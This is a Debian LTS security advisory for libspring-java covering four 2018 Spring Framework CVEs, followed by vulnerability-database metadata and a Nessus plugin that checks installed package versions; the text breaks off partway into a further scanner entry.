- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2635-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/
April 23, 2021 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------
Package : libspring-java
Version : 4.3.5-1+deb9u1
CVE ID : CVE-2018-1270 CVE-2018-11039 CVE-2018-11040 CVE-2018-15756
Debian Bug : 895114 911786
Multiple vulnerabilities were discovered in libspring-java, a modular
Java/J2EE application framework. An attacker may execute code, perform
XST attack, issue unauthorized cross-domain requests or cause a DoS
(Denial-of-Service) in specific configurations.
CVE-2018-1270
Spring Framework allows applications to expose STOMP over
WebSocket endpoints with a simple, in-memory STOMP broker through
the spring-messaging module. A malicious user (or attacker) can
craft a message to the broker that can lead to a remote code
execution attack.
CVE-2018-11039
Spring Framework allows web applications to change the HTTP
request method to any HTTP method (including TRACE) using the
HiddenHttpMethodFilter in Spring MVC. If an application has a
pre-existing XSS vulnerability, a malicious user (or attacker) can
use this filter to escalate to an XST (Cross Site Tracing) attack.
CVE-2018-11040
Spring Framework allows web applications to enable cross-domain
requests via JSONP (JSON with Padding) through
AbstractJsonpResponseBodyAdvice for REST controllers and
MappingJackson2JsonView for browser requests. Both are not enabled
by default in Spring Framework nor Spring Boot, however, when
MappingJackson2JsonView is configured in an application, JSONP
support is automatically ready to use through the "jsonp" and
"callback" JSONP parameters, enabling cross-domain requests.
CVE-2018-15756
Spring Framework provides support for range requests when serving
static resources through the ResourceHttpRequestHandler, or
starting in 5.0 when an annotated controller returns an
org.springframework.core.io.Resource. A malicious user (or
attacker) can add a range header with a high number of ranges, or
with wide ranges that overlap, or both, for a denial of service
attack.
For Debian 9 stretch, these problems have been fixed in version
4.3.5-1+deb9u1.
We recommend that you upgrade your libspring-java packages.
For the detailed security status of libspring-java please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libspring-java
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
{"id": "DEBIAN:DLA-2635-1:94A97", "vendorId": null, "type": "debian", "bulletinFamily": "unix", "title": "[SECURITY] [DLA 2635-1] libspring-java security update", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2635-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ \nApril 23, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : libspring-java\nVersion : 4.3.5-1+deb9u1\nCVE ID : CVE-2018-1270 CVE-2018-11039 CVE-2018-11040 CVE-2018-15756\nDebian Bug : 895114 911786\n\nMultiple vulnerabilities were discovered in libspring-java, a modular\nJava/J2EE application framework. An attacker may execute code, perform\nXST attack, issue unauthorized cross-domain requests or cause a DoS\n(Denial-of-Service) in specific configurations.\n\nCVE-2018-1270\n\n Spring Framework allows applications to expose STOMP over\n WebSocket endpoints with a simple, in-memory STOMP broker through\n the spring-messaging module. A malicious user (or attacker) can\n craft a message to the broker that can lead to a remote code\n execution attack.\n\nCVE-2018-11039\n\n Spring Framework allows web applications to change the HTTP\n request method to any HTTP method (including TRACE) using the\n HiddenHttpMethodFilter in Spring MVC. If an application has a\n pre-existing XSS vulnerability, a malicious user (or attacker) can\n use this filter to escalate to an XST (Cross Site Tracing) attack.\n\nCVE-2018-11040\n\n Spring Framework allows web applications to enable cross-domain\n requests via JSONP (JSON with Padding) through\n AbstractJsonpResponseBodyAdvice for REST controllers and\n MappingJackson2JsonView for browser requests. Both are not enabled\n by default in Spring Framework nor Spring Boot, however, when\n MappingJackson2JsonView is configured in an application, JSONP\n support is automatically ready to use through the "jsonp" and\n "callback" JSONP parameters, enabling cross-domain requests.\n\nCVE-2018-15756\n\n Spring Framework provides support for range requests when serving\n static resources through the ResourceHttpRequestHandler, or\n starting in 5.0 when an annotated controller returns an\n org.springframework.core.io.Resource. A malicious user (or\n attacker) can add a range header with a high number of ranges, or\n with wide ranges that overlap, or both, for a denial of service\n attack.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.3.5-1+deb9u1.\n\nWe recommend that you upgrade your libspring-java packages.\n\nFor the detailed security status of libspring-java please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libspring-java\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "published": "2021-04-23T18:29:29", "modified": "2021-04-23T18:29:29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html", "reporter": "Debian", "references": [], "cvelist": ["CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1270", "CVE-2018-15756"], "immutableFields": [], "lastseen": "2022-04-06T22:32:59", "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-59684"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0277", "CPAI-2019-0224"]}, {"type": "checkpoint_security", "idList": ["CPS:SK178605"]}, {"type": "cve", "idList": ["CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1270", "CVE-2018-1275", "CVE-2018-15756"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-11039", "DEBIANCVE:CVE-2018-11040", "DEBIANCVE:CVE-2018-1270", "DEBIANCVE:CVE-2018-1275", "DEBIANCVE:CVE-2018-15756"]}, {"type": "exploitdb", "idList": ["EDB-ID:44796"]}, {"type": "f5", "idList": ["F5:K29042031"]}, {"type": "github", "idList": ["GHSA-3RMV-2PG5-XVQJ", "GHSA-9GCM-F4X3-8JPW", "GHSA-F26X-PR96-VW86", "GHSA-FFVQ-7W96-97P7", "GHSA-P5HG-3XM3-GCJG"]}, {"type": "ibm", "idList": ["366CE799D9AEE4234CE4D38A22D774A769300127F0319D9238DAEC27C48436E1", "43F13A59BAC727291BE408250411526C9C997271C9B4A25BD10C74E510C0D8CA", "55156FCD842A2CC421648C286DB79335E98E88FF88D30BADC857588FB7995139", "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2635.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_15.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2019.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_APR_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2019.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_OCT_2018.NASL", "ORACLE_WEBCENTER_SITES_JUL_2019_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2019.NASL", "SPRING_CVE-2018-1270.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2019", "ORACLE:CPUAPR2019-5072813", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2019-5072801", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2019-5072835", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2018-4428296", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2019-5072832", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:DLA-2635-1", "OSV:GHSA-3RMV-2PG5-XVQJ", "OSV:GHSA-9GCM-F4X3-8JPW", "OSV:GHSA-F26X-PR96-VW86", "OSV:GHSA-FFVQ-7W96-97P7", "OSV:GHSA-P5HG-3XM3-GCJG"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147974"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:1C6EAE3D0C10C1B56BD63325DEB012A1"]}, {"type": "redhat", "idList": ["RHSA-2018:1320", "RHSA-2018:2939", "RHSA-2020:0983", "RHSA-2020:3133"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11039", "RH:CVE-2018-11040", "RH:CVE-2018-1270", "RH:CVE-2018-1275", "RH:CVE-2018-15756"]}, {"type": "seebug", "idList": ["SSV:97214"]}, {"type": "symantec", "idList": ["SMNTC-105703"]}, {"type": "thn", "idList": ["THN:D7C30FB307A1DC524FADFFBF2D1BEAB1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11039", "UB:CVE-2018-11040", "UB:CVE-2018-1270", "UB:CVE-2018-1275", "UB:CVE-2018-15756"]}, {"type": "zdt", "idList": ["1337DAY-ID-30478"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-59684"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0277", "CPAI-2019-0224"]}, {"type": "cve", "idList": ["CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1270", "CVE-2018-15756"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-11039", "DEBIANCVE:CVE-2018-11040", "DEBIANCVE:CVE-2018-1270", "DEBIANCVE:CVE-2018-15756"]}, {"type": "exploitdb", "idList": ["EDB-ID:44796"]}, {"type": "f5", "idList": ["F5:K29042031"]}, {"type": "github", "idList": ["GHSA-9GCM-F4X3-8JPW", "GHSA-F26X-PR96-VW86", "GHSA-P5HG-3XM3-GCJG"]}, {"type": "ibm", "idList": ["43F13A59BAC727291BE408250411526C9C997271C9B4A25BD10C74E510C0D8CA"]}, {"type": "nessus", "idList": ["ORACLE_PRIMAVERA_P6_EPPM_CPU_OCT_2018.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021", "ORACLE:CPUOCT2019-5072832"]}, {"type": "osv", "idList": ["OSV:GHSA-9GCM-F4X3-8JPW", "OSV:GHSA-F26X-PR96-VW86"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147974"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:1C6EAE3D0C10C1B56BD63325DEB012A1"]}, {"type": "redhat", "idList": ["RHSA-2020:3133"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11039", "RH:CVE-2018-11040", "RH:CVE-2018-1270", "RH:CVE-2018-1275", "RH:CVE-2018-15756"]}, {"type": "seebug", "idList": ["SSV:97214"]}, {"type": "symantec", "idList": ["SMNTC-105703"]}, {"type": "thn", "idList": ["THN:D7C30FB307A1DC524FADFFBF2D1BEAB1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11039", "UB:CVE-2018-11040", "UB:CVE-2018-1270", "UB:CVE-2018-15756"]}, {"type": "zdt", "idList": ["1337DAY-ID-30478"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-11039", "epss": "0.002020000", "percentile": "0.563980000", "modified": "2023-03-17"}, {"cve": "CVE-2018-11040", "epss": "0.003590000", "percentile": "0.678030000", "modified": "2023-03-17"}, {"cve": "CVE-2018-1270", "epss": "0.915880000", "percentile": "0.983150000", "modified": "2023-03-17"}, {"cve": "CVE-2018-15756", "epss": "0.002680000", "percentile": "0.626170000", "modified": "2023-03-16"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1659986029, "score": 1659898735, "epss": 1679070268}, "_internal": {"score_hash": "4f432a73d62791661adc639def5ab1dc"}, "affectedPackage": [{"packageFilename": "libspring-test-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-test-java"}, {"packageFilename": "libspring-web-servlet-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-web-servlet-java"}, {"OSVersion": "9", "packageFilename": "libspring-orm-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-orm-java"}, {"OSVersion": "9", "packageFilename": "libspring-oxm-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-oxm-java"}, {"OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "packageFilename": "libspring-jdbc-java_4.3.5-1+deb9u1_all.deb", "operator": "lt", "packageName": "libspring-jdbc-java"}, {"OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "packageFilename": "libspring-context-java_4.3.5-1+deb9u1_all.deb", "operator": "lt", "packageName": "libspring-context-java"}, {"packageFilename": "libspring-context-support-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-context-support-java"}, {"packageFilename": "libspring-instrument-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-instrument-java"}, {"OSVersion": "9", "arch": "all", "OS": "Debian", "packageFilename": "libspring-web-portlet-java_4.3.5-1+deb9u1_all.deb", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-web-portlet-java"}, {"OSVersion": "9", "arch": "all", "packageFilename": "libspring-beans-java_4.3.5-1+deb9u1_all.deb", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-beans-java"}, {"OSVersion": "9", "packageFilename": "libspring-transaction-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-transaction-java"}, {"packageFilename": "libspring-web-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-web-java"}, {"OSVersion": "9", "packageFilename": "libspring-messaging-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-messaging-java"}, {"packageFilename": "libspring-expression-java_4.3.5-1+deb9u1_all.deb", "OSVersion": "9", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-expression-java"}, {"OSVersion": "9", "packageFilename": "libspring-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-java"}, {"OSVersion": "9", "packageFilename": "libspring-core-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-core-java"}, {"OSVersion": "9", "packageFilename": "libspring-aop-java_4.3.5-1+deb9u1_all.deb", "arch": "all", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-aop-java"}, {"OSVersion": "9", "arch": "all", "packageFilename": "libspring-jms-java_4.3.5-1+deb9u1_all.deb", "OS": "Debian", "packageVersion": "4.3.5-1+deb9u1", "operator": "lt", "packageName": "libspring-jms-java"}]}
{"nessus": [{"lastseen": "2023-02-04T14:40:54", "description": "Multiple vulnerabilities were discovered in libspring-java, a modular Java/J2EE application framework. An attacker may execute code, perform XST attack, issue unauthorized cross-domain requests or cause a DoS (denial of service) in specific configurations.\n\nCVE-2018-1270\n\nSpring Framework allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.\n\nCVE-2018-11039\n\nSpring Framework allows web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.\n\nCVE-2018-11040\n\nSpring Framework allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the 'jsonp' and 'callback' JSONP parameters, enabling cross-domain requests.\n\nCVE-2018-15756\n\nSpring Framework provides support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack.\n\nFor Debian 9 stretch, these problems have been fixed in version 4.3.5-1+deb9u1.\n\nWe recommend that you upgrade your libspring-java packages.\n\nFor the detailed security status of libspring-java please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libspring-java\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-27T00:00:00", "type": "nessus", "title": "Debian DLA-2635-1 : libspring-java security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1270", "CVE-2018-15756"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libspring-aop-java", "p-cpe:/a:debian:debian_linux:libspring-beans-java", "p-cpe:/a:debian:debian_linux:libspring-context-java", "p-cpe:/a:debian:debian_linux:libspring-context-support-java", "p-cpe:/a:debian:debian_linux:libspring-core-java", "p-cpe:/a:debian:debian_linux:libspring-expression-java", "p-cpe:/a:debian:debian_linux:libspring-instrument-java", "p-cpe:/a:debian:debian_linux:libspring-jdbc-java", "p-cpe:/a:debian:debian_linux:libspring-jms-java", "p-cpe:/a:debian:debian_linux:libspring-messaging-java", "p-cpe:/a:debian:debian_linux:libspring-orm-java", "p-cpe:/a:debian:debian_linux:libspring-oxm-java", "p-cpe:/a:debian:debian_linux:libspring-test-java", "p-cpe:/a:debian:debian_linux:libspring-transaction-java", "p-cpe:/a:debian:debian_linux:libspring-web-java", "p-cpe:/a:debian:debian_linux:libspring-web-portlet-java", "p-cpe:/a:debian:debian_linux:libspring-web-servlet-java", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2635.NASL", "href": "https://www.tenable.com/plugins/nessus/149004", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2635-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149004);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2018-11039\", \"CVE-2018-11040\", \"CVE-2018-1270\", \"CVE-2018-15756\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Debian DLA-2635-1 : libspring-java security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple vulnerabilities were discovered in libspring-java, a modular\nJava/J2EE application framework. An attacker may execute code, perform\nXST attack, issue unauthorized cross-domain requests or cause a DoS\n(denial of service) in specific configurations.\n\nCVE-2018-1270\n\nSpring Framework allows applications to expose STOMP over WebSocket\nendpoints with a simple, in-memory STOMP broker through the\nspring-messaging module. A malicious user (or attacker) can craft a\nmessage to the broker that can lead to a remote code execution attack.\n\nCVE-2018-11039\n\nSpring Framework allows web applications to change the HTTP request\nmethod to any HTTP method (including TRACE) using the\nHiddenHttpMethodFilter in Spring MVC. If an application has a\npre-existing XSS vulnerability, a malicious user (or attacker) can use\nthis filter to escalate to an XST (Cross Site Tracing) attack.\n\nCVE-2018-11040\n\nSpring Framework allows web applications to enable cross-domain\nrequests via JSONP (JSON with Padding) through\nAbstractJsonpResponseBodyAdvice for REST controllers and\nMappingJackson2JsonView for browser requests. Both are not enabled by\ndefault in Spring Framework nor Spring Boot, however, when\nMappingJackson2JsonView is configured in an application, JSONP support\nis automatically ready to use through the 'jsonp' and 'callback' JSONP\nparameters, enabling cross-domain requests.\n\nCVE-2018-15756\n\nSpring Framework provides support for range requests when serving\nstatic resources through the ResourceHttpRequestHandler, or starting\nin 5.0 when an annotated controller returns an\norg.springframework.core.io.Resource. A malicious user (or attacker)\ncan add a range header with a high number of ranges, or with wide\nranges that overlap, or both, for a denial of service attack.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.3.5-1+deb9u1.\n\nWe recommend that you upgrade your libspring-java packages.\n\nFor the detailed security status of libspring-java please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/libspring-java\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/libspring-java\"\n );\n # https://security-tracker.debian.org/tracker/source-package/libspring-java\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6bb4a348\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-aop-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-beans-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-context-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-context-support-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-core-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-expression-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-instrument-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-jdbc-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-jms-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-messaging-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-orm-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-oxm-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-test-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-transaction-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-web-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-web-portlet-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libspring-web-servlet-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libspring-aop-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-beans-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-context-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-context-support-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-core-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-expression-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-instrument-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-jdbc-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-jms-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-messaging-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-orm-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-oxm-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-test-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-transaction-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-web-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-web-portlet-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libspring-web-servlet-java\", reference:\"4.3.5-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-02T16:29:06", "description": "According to its self-reported version number, the Oracle GoldenGate for Big Data application located on the remote host is 12.3.1.1.x less than 12.3.1.1.6 or 12.3.2.1.x less than 12.3.2.1.5. It is, therefore, affected by a denial of 